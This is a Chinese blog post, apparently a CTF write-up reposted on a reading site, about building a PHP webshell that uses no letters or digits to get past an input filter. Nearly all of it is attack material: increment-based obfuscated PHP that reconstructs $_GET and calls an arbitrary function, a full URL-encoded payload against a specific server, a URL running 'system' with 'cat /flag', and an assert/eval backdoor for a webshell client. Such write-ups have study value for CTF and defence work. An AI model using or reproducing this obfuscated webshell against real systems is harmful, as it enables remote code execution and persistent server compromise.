php特殊webshell(无数字,字母,位运算)

作者: 王一航 | 来源:发表于2017-07-15 17:53 被阅读418次

php特殊webshell(无数字,字母,位运算)
SKSEC 2019 Summer Training 总结文档
JS 正则-验证密码包含数字和字母的方法
1.5 PHP运算符
无标题文章
webshell
PHP函数 ------ ctype_alnum
[PHP] php字符串中的第n个字符
随机生成密码（如MYSQL）
使用正则验证密码是否合格

<?php
$_=[].[];
$__='';
$_=$_[''];
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$__.=$_; // E
$_=++$_;
$_=++$_;
$__=$_.$__; // GE
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$_=++$_;
$__.=$_; // GET
var_dump(${'_'.$__}[_](${'_'.$__}[__])); // $_GET['_']($_GET['__']);

完整 Payload

http://120.24.215.80:10010/?c=%24_%3d%5b%5d.%5b%5d%3b%24__%3d%27%27%3b%24_%3d%24_%5b%27%27%5d%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__.%3d%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__%3d%24_.%24__%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24_%3d%2b%2b%24_%3b%24__.%3d%24_%3b%24%7b%27_%27.%24__%7d%5b_%5d(%24%7b%27_%27.%24__%7d%5b__%5d)%3b

获取 flag

http://120.24.215.80:10010/uploads/vVyyxGUTyFsL0tgdvmCjVkvRAehduvvQ.php?_=system&__=cat /flag

菜刀连接

http://120.24.215.80:10010/uploads/vVyyxGUTyFsL0tgdvmCjVkvRAehduvvQ.php?_=assert&__=eval("$_POST[c]");

网友评论

Ethical Hackers

本文标题：php特殊webshell(无数字,字母,位运算)

本文链接：https://www.haomeiwen.com/subject/vyhzhxtx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

php特殊webshell(无数字,字母,位运算)

相关文章

php特殊webshell(无数字,字母,位运算)

SKSEC 2019 Summer Training 总结文档

JS 正则-验证密码包含数字和字母的方法

1.5 PHP运算符

无标题文章

webshell

PHP函数 ------ ctype_alnum

[PHP] php字符串中的第n个字符

随机生成密码（如MYSQL）

使用正则验证密码是否合格

网友评论

延伸阅读

深度阅读

栏目导航

热点阅读

Ethical Hackers